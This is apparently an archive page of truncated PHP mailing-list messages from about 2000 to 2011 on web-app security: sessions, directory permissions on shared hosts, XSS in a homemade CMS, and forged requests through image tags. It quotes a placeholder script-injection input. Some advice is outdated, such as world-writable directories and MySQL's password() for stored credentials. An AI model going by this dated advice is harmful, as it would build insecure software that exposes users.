At 2:53 PM -0500 4/8/11, Jay Blanchard wrote:
[snip]
whats the best way to learn about security in php?
[/snip]
Study, study, study!
Chris Shiflett is a recognized expert on PHP security -
http://shiflett.org/
He has a great book on PHP Security -
hey guys/girls,
whats the best way to learn about security in php?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[snip]
whats the best way to learn about security in php?
[/snip]
Study, study, study!
Chris Shiflett is a recognized expert on PHP security -
http://shiflett.org/
He has a great book on PHP Security -
http://www.amazon.com/exec/obidos/ASIN/059600656X/ref=nosim/chrisshiflet
t-20
--
PHP
Best way to learn about security of something is to learn how to break it...
On Apr 8, 2011 3:55 PM, Jay Blanchard jblanch...@pocket.com wrote:
[snip]
whats the best way to learn about security in php?
[/snip]
Study, study, study!
Chris Shiflett is a recognized expert on PHP security -
On Fri, Apr 8, 2011 at 3:24 PM, nighthawk1256 er...@ns.sympatico.ca wrote:
hey guys/girls,
whats the best way to learn about security in php?
Here are some relevant topics to consider:
- Validate input (only accept what you're expecting, via GET, POST, and
COOKIE, and don't try to fix
On Tue, Aug 25, 2009 at 00:07, Augusto Flavioafla...@gmail.com wrote:
Answers: (choose 2)
Error messages will contain sensitive session information
Error messages can contain cross site scripting attacks
Security risks involved in logging are handled by PHP
X Error messages give
Hi all,
i'm discutting with my friend about this question for 30 min and i do not
agree with he. Here is the question:
Why is it important from a security perspective to never display PHP error
messages directly to the end user, yet always log them?
Answers: (choose 2)
Error messages
VamVan vamsee...@gmail.com wrote in message
news:12eb8b030901141421u6741b943q396bc784136b7...@mail.gmail.com...
On Wed, Jan 14, 2009 at 2:22 PM, Frank Stanovcak
blindspot...@comcast.netwrote:
This is mostly to make sure I understand how sessions are handled
correctly.
As far as sessions
Frank Stanovcak wrote:
VamVan vamsee...@gmail.com wrote in message
news:12eb8b030901141421u6741b943q396bc784136b7...@mail.gmail.com...
On Wed, Jan 14, 2009 at 2:22 PM, Frank Stanovcak
blindspot...@comcast.netwrote:
This is mostly to make sure I understand how sessions are handled
This is mostly to make sure I understand how sessions are handled correctly.
As far as sessions are concerned the variable data is stored on the server
(be it in memory or temp files), and never transmitted accross the net
unless output to the page? So this means I should be able to store the
On Wed, Jan 14, 2009 at 2:22 PM, Frank Stanovcak
blindspot...@comcast.netwrote:
This is mostly to make sure I understand how sessions are handled
correctly.
As far as sessions are concerned the variable data is stored on the server
(be it in memory or temp files), and never transmitted
Does anyone know a good way to protect a directory that a php script NEEDS
to write too?
What I'm doing now:
1. create a directory manually myDir
2. chmod 777 myDir
3. password protect the directory with htaccess
Is this the best way, or is there something better?
Also, is there a way to mkdir
Does anyone know a good way to protect a directory that a php script NEEDS
to write too?
What I'm doing now:
1. create a directory manually myDir
2. chmod 777 myDir
3. password protect the directory with htaccess
Is this the best way, or is there something better?
You could chmod the
Andrew Peterson wrote:
Does anyone know a good way to protect a directory that a php script NEEDS
to write too?
What I'm doing now:
1. create a directory manually myDir
2. chmod 777 myDir
3. password protect the directory with htaccess
Is this the best way, or is there something better?
My pleasure, Arno!
On 5/22/07, Arno Kuhl [EMAIL PROTECTED] wrote:
-Original Message-
From: Daniel Brown [mailto:[EMAIL PROTECTED]
Sent: 18 May 2007 10:27
To: Al
Cc: php-general@lists.php.net
Subject: Re: [PHP] Security Question, re directory permissions [long
answer]
On 5/18/07
On 5/19/07, itoctopus [EMAIL PROTECTED] wrote:
I'm genuinely interested to know with whom you're hosting...
No problem, it's www.dapx.com, it hasn't a lot security, safe_mode is
off for example.
If you know the right stuff from another user on the same server, you
can actually do some nice
I use Hosting Matters. It is super reliable and solid.
itoctopus wrote:
I'm genuinely interested to know with whom you're hosting...
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
I'm on a shared Linux host and have been wondering about security and directory other
[world] permissions.
The defaults are 755. The 'others' [world] can read them only.
Is there a security hole if a dir on the doc root if a directory has
permissions 757?
If there is a security problem, what
On 5/18/07, Al [EMAIL PROTECTED] wrote:
I'm on a shared Linux host and have been wondering about security and directory other
[world] permissions.
The defaults are 755. The 'others' [world] can read them only.
Is there a security hole if a dir on the doc root if a directory has
permissions
How can they write or edit files there without having ftp access or the site's
file manager?
Tijnema ! wrote:
On 5/18/07, Al [EMAIL PROTECTED] wrote:
I'm on a shared Linux host and have been wondering about security and
directory other [world] permissions.
The defaults are 755. The 'others'
On 5/18/07, Al [EMAIL PROTECTED] wrote:
How can they write or edit files there without having ftp access or the site's
file manager?
SSH access? Telnet maybe? PHP script? CGI script? ASP script?
There are a lot of possible ways someone can write there.
Tijnema
Tijnema ! wrote:
On
On 5/18/07, Al [EMAIL PROTECTED] wrote:
I'm on a shared Linux host and have been wondering about security and
directory other [world] permissions.
The defaults are 755. The 'others' [world] can read them only.
Is there a security hole if a dir on the doc root if a directory has
permissions
But, SSH and telnet, etc. require authentication login-in and all the executables you mentioned [and others] require
someone who has access to upload a harmful file to start with. Right? Once they are in there, they can do anything they
please anyhow.
Al.
Tijnema ! wrote:
On
On 5/19/07, Al [EMAIL PROTECTED] wrote:
But, SSH and telnet, etc. require authentication login-in and all the
executables you mentioned [and others] require
someone who has access to upload a harmful file to start with. Right? Once
they are in there, they can do anything they
please anyhow.
How can anyone, other than the staff, get into my site? Far as I know, other users can't get out of their own domain
space and into mine.
Tijnema wrote:
On 5/19/07, Al [EMAIL PROTECTED] wrote:
But, SSH and telnet, etc. require authentication login-in and all the
executables you mentioned
On Fri, 2007-05-18 at 20:16 -0400, Al wrote:
How can anyone, other than the staff, get into my site? Far as I know, other
users can't get out of their own domain
space and into mine.
Bugs in your code, bugs in third-party code, bugs in PHP itself,
sometimes they can be abused to take
On 5/19/07, Al [EMAIL PROTECTED] wrote:
How can anyone, other than the staff, get into my site? Far as I know, other
users can't get out of their own domain
space and into mine.
That's quite easy, especially when you have SSH access.
Of course, it will only work with specific settings, and
I guess your comment The less secure everything else is. is the best
answer.
I'm developing a CMS where logged-in, selected users can create new directories and pages in them. I'm comfortable that
my code is secure. I'm using php's ftp functions, with good security, to mkdir and create
I'm genuinely interested to know with whom you're hosting...
--
itoctopus - http://www.itoctopus.com
Tijnema [EMAIL PROTECTED] wrote in message
news:[EMAIL PROTECTED]
On 5/19/07, Al [EMAIL PROTECTED] wrote:
How can anyone, other than the staff, get into my site? Far as I know,
other users
Here is part of my proxie tags to html tags translation array. Looks pretty safe
to me. There is other code to recognize paragraphs and lists, etc.
$translate_array= array(
'link' = 'a href=http://',
'/link' = '/a',
'slink' = 'a href=https://',
'/slink'=
Al wrote:
Here is part of my proxie tags to html tags translation array. Looks
pretty safe to me. There is other code to recognize paragraphs and
lists, etc.
any 'real' html in the content your 'translating' is still going to
be there after translation - and therefore sent to the client,
quite
I've got a website on a virtual-host, Apache/Linux system running php scripts.
I particular, I've designed a CMS where designated individuals compose and edit
text in an html textarea, and then save the raw text in files. Custom [i.e.,
proxie] tags are used for emphasizing and the formating
Al wrote:
I've got a website on a virtual-host, Apache/Linux system running php
scripts.
I particular, I've designed a CMS where designated individuals compose
and edit text in an html textarea, and then save the raw text in files.
Custom [i.e., proxie] tags are used for emphasizing and the
Good point about the 'script evil haxor code here; /script'. That's bad for
our users, not the site, per se.
Raw text to html is primarily done with a series of preg_replace() operations.
No include() or exec() allowed near the text.
Sounds like I'm in pretty good shape.
Thanks for the
Al wrote:
Good point about the 'script evil haxor code here; /script'. That's
bad for our users, not the site, per se.
what is bad for your users is bad for your site, on top of that
the script is running in the context of your domain - all sorts of
nasty possibilities that could affect your
void session_set_cookie_params ( int lifetime [, string path [, string
domain [, bool secure [, bool httponly )
The bool secure part of that means you can set your cookie
parameters such that your cookies are sent/received only over SSL
connections. Only available since PHP 4.0.4
On Thu,
Robert Cummings wrote:
On Thu, 2006-11-23 at 09:56 +0530, Sumeet wrote:
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google
Teach a man to fish...
Cheers,
Rob.
Give a man a
There are a few ways of working you should adpot early as they protect
against a range of security problems. Some examples:
1. Always initialised your variables.
2. If you can, turn off register_globals, or code defensively if you can't.
3. Always mistrust incoming data, validate, check contents
On Wed, 2006-11-22 at 22:45 -0600, Larry Garfield wrote:
On Wednesday 22 November 2006 22:38, Robert Cummings wrote:
maybe we should all refer to forum and google
Teach a man to fish...
And you lose your monopoly on fisheries.
Yeah, but I got Park Place and Boardwalk!!! *nyah nyah*
Sorry didn't quite get that finished - hit send by accident ( and had
it go to one person, instead of to the list ).
Few quick tips - not all strictly security related, but may affect security.
Hi,
Now that i finished the client side of the web application i would like to
improve the security of my administration side of this web application.
My web hoster support a shared SSL protocol, however i would like to do more
than simply use the SSL...
I've heard that cookies and sessions can
On Wed, November 22, 2006 11:20 am, Alain Roger wrote:
Now that i finished the client side of the web application i would
like to
improve the security of my administration side of this web
application.
My web hoster support a shared SSL protocol, however i would like to
do more
than simply
Alain Roger wrote:
I've heard that cookies and sessions can be easily hacked...so what do
you
use to secure your web page.
which methods ?
If you want to be secure, don't trust anything. Cookies are easily
modified by a user, so never store anything sensitive in there without
masking it
dear richard,
yours was an amazing reply... simple and true and well written...
where did u learn all the stuff?... ;-)
anyway. is there a step by step process for checking if your site is
secure?... i know you would say to get a hacker or something... but as a
programmer, i would like
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google, and stop posting in this
forum can u please start first...
thanks anyway...mani needed some silly sarcastic comments to get
On Thu, 2006-11-23 at 09:56 +0530, Sumeet wrote:
Western, Matthew wrote:
where did u learn all the stuff?... ;-)
Maybe reading the manual?
thanks matthew,
maybe we should all refer to forum and google
Teach a man to fish...
Cheers,
Rob.
--
On Wednesday 22 November 2006 22:38, Robert Cummings wrote:
maybe we should all refer to forum and google
Teach a man to fish...
And you lose your monopoly on fisheries.
--
Larry Garfield AIM: LOLG42
[EMAIL PROTECTED] ICQ: 6817012
If nature has made any one
Hi list
I've got a concern for a user add/edit form.
Right now when the user is logged in, I put its id in the session.
Then when the user edits his details I put the id in the form and when it
comes back I verify if the id matches the one in the session.
Is it possible for someone who does
Andy Pieters napisał(a):
Is it possible for someone who does not have access to the server to edit
arbitary accounts?
well this depends on the forum You use, there're many many exploits out
there.
The best way to know is to try and keep up with places like
the bugtraq@securityfocus.com list,
On Wednesday 07 December 2005 08:57, Łukasz Hejnak wrote:
The best way to know is to try and keep up with places like
the bugtraq@securityfocus.com list, or other security websites/mailing
lists and such.
It isn't a forum, it is software I write myself.
--
Now listening to Top! Radio Live
Hi Andy,
On 12/7/05, Andy Pieters [EMAIL PROTECTED] wrote:
Right now when the user is logged in, I put its id in the session.
Then when the user edits his details I put the id in the form and when it
comes back I verify if the id matches the one in the session.
Well, is session data saved in
hey...
anybody here have a serious background in security, or with 'man in the
middle attacks'???
in particular, i'm trying to get my hands around ways of preventing a
server/browser app to be susceptible to a 'man in the middle attack'
serious pointers would be helpful. searching across google
-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]
Sent: Monday, November 21, 2005 8:34 PM
To: [EMAIL PROTECTED]
Subject: RE: [PHP] security question... man in the middle attacks
'man in the middle' relates to any interception/redirection and I see I was
looking at it more as a hacker posing
how many of you actually attempt to verify that the browser being used
by the client is indeed a legitimate (non-hacked) browser?
I think you need to clearly define what a legitimate browser is. In my
opinion, the ambiguity in your question is the root cause of the
disorganization in this
On 6/20/05, bruce [EMAIL PROTECTED] wrote:
hi...
a number of you write apache/web/server apps that deal with secure
information.. in doing some research it occured to me that a potential weak
link is on the client side, regarding the browser? how many of you actually
attempt to verify that
hi...
a number of you write apache/web/server apps that deal with secure
information.. in doing some research it occured to me that a potential weak
link is on the client side, regarding the browser? how many of you actually
attempt to verify that the browser being used by the client is indeed a
Hello all,
I have the following script called login.inc which I include at the
beginning of each page on my customer control panel. Basically it checks to
see if a session has been created with user details and if it has it carries
on with the rest of the page and if not the login screen is
Ian Gray wrote:
Hello all,
My question is, how secure is this? I have the password, username etc in
a
MYSQL database but I haven't encrypted it (don't know how)
The MySQL 'password' function at http://mysql.com would work.
For something that is portable to non MySQL systems, you can use
Richard Lynch wrote:
Ian Gray wrote:
My question is, how secure is this? I have the password, username etc in
a
MYSQL database but I haven't encrypted it (don't know how)
The MySQL 'password' function at http://mysql.com would work.
For something that is portable to non MySQL systems, you can use
Hi folks. Thanks to all for the replies to my question about security
on shared hosting the other day.
I've contacted my hosting provider and they will be fixing the issues
I've pointed out to them.
I've got a question about a section of Chris's article on PHP security
from his OSCON 2004 talk.
Hi folks. Sorry if this gets posted twice, but I sent it originally
almost an hour ago and it hasn't shown up on the list yet.
Thanks to all for the replies to my question about security on shared
hosting the other day.
I've contacted my hosting provider and they will be fixing the issues
I've
--- Pablo Gosse [EMAIL PROTECTED] wrote:
I've got a question about a section of Chris's article on PHP
security from his OSCON 2004 talk.
When talking about protecting database credentials, Chris
mentions creating a file (readable only by root) with the
following:
SetEnv DB_USER myuser
On Friday 01 October 2004 00:59, Pablo Gosse wrote:
When talking about protecting database credentials, Chris mentions
creating a file (readable only by root) with the following:
SetEnv DB_USER myuser
SetEnv DB_PASS mypass
and then using this:
Include /path/to/secret-stuff
in the
On 20 February 2004 22:29, Ed Lazor wrote:
PHP include statements default to the current directory. If
the path to
my PHP files is /home/osmosis/public_html, why would users visiting my
site occasionally get an error that the include file wasn't found in
/home/budguy/public_html?
It's
PHP include statements default to the current directory. If the path to
my PHP files is /home/osmosis/public_html, why would users visiting my
site occasionally get an error that the include file wasn't found in
/home/budguy/public_html?
It's like PHP is somehow confused and running my script
Ed Lazor mailto:[EMAIL PROTECTED]
on Friday, February 20, 2004 2:29 PM said:
It's like PHP is somehow confused and running my script with the
account settings (and permissions, possibly) for another user on my
host provider's server. If that's true, wouldn't this quality as a
security
You're not being rude. I contacted them immediately about the script
errors and described what seemed to be a security hole. The tech I
spoke with didn't know what I was talking about, so I asked them to
notify the owner of the problem and that I'd research it more and let
them know of anything
Hello,
I'm trying to develop a secure web based application and my only tools are
php, mysql, and a SSL connection.
Does anyone know of any good references for this kind of development?
What I really need to do is to make sure that given users only gain access
to the parts of the application
On Thu, 18 Dec 2003 10:43:14 -0500, you wrote:
I'm trying to develop a secure web based application and my only tools are
php, mysql, and a SSL connection.
Does anyone know of any good references for this kind of development?
What I really need to do is to make sure that given users only gain
Can anyone think of any security caveats with regard to turning
output_buffering on?
I can't, but it's too hot to think straight these days
Tnx.
--
Paul Chvostek [EMAIL PROTECTED]
it.canada
Ananth Kesari [EMAIL PROTECTED] wrote... :
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell.
I know :)
We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and
Hi,
I am working on porting PHP onto NetWare.
At this point of time, I am trying to understand the way security is
implemented for PHP on Unix / Linux. I mean, how are the different users
distinguished from Unix / Linux. Do they get to login into the Unix /
Linux system? Do they have separate
Hi,
I mailed this earlier, but got no response. Maybe it went unnoticed.
So, resending it again. Please read below.
Your help in this is appreciated.
Thanks,
Ananth.
Hi,
I am working on porting PHP onto NetWare.
I am newbie to Unix / Linux systems and at this point of time, I am
trying to
Ananth Kesari [EMAIL PROTECTED] wrote... :
I am working on porting PHP onto NetWare.
What exactly do you mean?
I am newbie to Unix / Linux systems and at this point of time, I am
trying to understand the way security is implemented for PHP on Unix /
Linux. I mean, how are the different
Ananth,
For starters, you are probably on the wrong list - the PHP developers list
is probably where you should be asking this question.
Second, PHP runs through the web server, so the user is the same user the
web server, usually nobody, although that depends on the how the web
server is
--- Miles Thompson [EMAIL PROTECTED] wrote:
Ananth,
For starters, you are probably on the wrong list -
the PHP developers list is probably where you should
be asking this question.
Please do not go around saying this. We have enough
problems with these types of posts winding up on php-dev
Thanks for your inputs. Will proceed from here.
Well, if you did not know, NetWare is an operating system brought out
by Novell. We are working on porting PHP onto NetWare. In fact, we
already have ported PHP 4.2.3 onto NetWare and we have synched up our
souces for the 4.3 branch.
Thanks,
Thanks for your inputs. Will proceed from here.
Well, I first posted this query on this list. But seeing no response, I
thought probably it should have gone into PHP-dev list. When I posted
there, I was discouraged to post such mails there. So, I came back to
the general list.
Thanks,
Ananth.
I want to give my users the ability to submit a URL to a database, then when
they pull up their page, their photo is included .. what I'm worried about
is them pointing the link to some malicious code or something..
Obviously I can validate the file extension (.gif or .jpg) .. and I'm going
to
I guess you use some webserver, let's take apache.
Apache's mime.conf has set several extensions,
also php extensions. So only .php, .php3, .php4
files will be parsed by php.
Chad Day wrote:
I want to give my users the ability to submit a URL to a database, then when
they pull up their page,
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts serve you well.
There
Chris Shiflett wrote:
--- Chad Day [EMAIL PROTECTED] wrote:
I want to give my users the ability to submit a URL
to a database, then when they pull up their page,
their photo is included .. what I'm worried about
is them pointing the link to some malicious code or
something..
Your instincts
On Wednesday 22 January 2003 01:40, Sean Burlington wrote:
is there really any site which will accept a book order based an a sigle
GET ?
Amazon makes a big deal of their one-click shopping feature. It's so good
they've even patented it.
--
Jason Wong - Gremlins Associates -
Gibbs, Liam - SXIA wrote:
I agree that there are risks - but I do think this can be done safely
Couldn't you just check the submitted URL and find out if it's a gif or
jpeg? I don't think even PHP-enabled servers will run a gif or jpeg.
please send replies to the list ...
and you cant
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a broswer attempts to load an image reference by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about this earlier, but you
--- Sean Burlington [EMAIL PROTECTED] wrote:
is there really any site which will accept a book
order based an a sigle GET?
Well, yes, but that is not the point really. The example of
the img tag is just one way you can forge an HTTP request
from another user (the victim).
Also consider that
Chris Shiflett wrote:
--- Sean Burlington [EMAIL PROTECTED] wrote:
I'm not sure what harm could be done by this though.
if a broswer attempts to load an image reference by
an img tag - but finds an unsuitable type of data -
I would expect it simply to ignore it...
I sent a response about
Happy Friday!
I don't know anything about the innards of the PHP/Apache relationship. I am
wondering if there is a security advantage to using the getenv() function to
access an environment variable, instead of using the $HTTP_SERVER_VARS
array, or, if register_globals is on, the global version
: Re: [PHP] security question
On Wednesday 17 October 2001 19:14, Daniel Goldin wrote:
But I need to protect the files themselves. Is
their a way to protect the files without adding another level of
authorization when someone does access them from the browser?
Move these text files one
In a lot of PHP code that I have seen, there are lines such as this:
mysql_connect('localhost', 'mysql_login()', 'mysql_password()');
that is used to hide the login and password from someone should they
somehow view the code instead of the output of the PHP file. My question
is, how do I set
somehow view the code instead of the output of the PHP file. My question
is, how do I set up those functions mysql_login and mysql_password? Are
they just standard functions defined in a header someplace? Or is this even
the best, most secure way of handling it?
Include your login and
Hello there,
I'm posting a username and a password with:
input type="hidden" name="username" value="?php echo $username ?"
input type="hidden" name="password" value="?php echo $password ?"
When I check $HTTP_POST_VARS I can see the values as they're plain text. Is
this still safe to do or
I think you should encrypt (crypt).
On Tue, 13 Feb 2001, Marc Aragnou wrote:
Hello there,
I'm posting a username and a password with:
input type="hidden" name="username" value="?php echo $username ?"
input type="hidden" name="password" value="?php echo $password ?"
When I check
agnou" [EMAIL PROTECTED]
To: "PHP Lists" [EMAIL PROTECTED]
Sent: Tuesday, February 13, 2001 6:00 AM
Subject: [PHP] security question
Hello there,
I'm posting a username and a password with:
input type="hidden" name="username" value="?php echo $username
94 matches
Mail list logo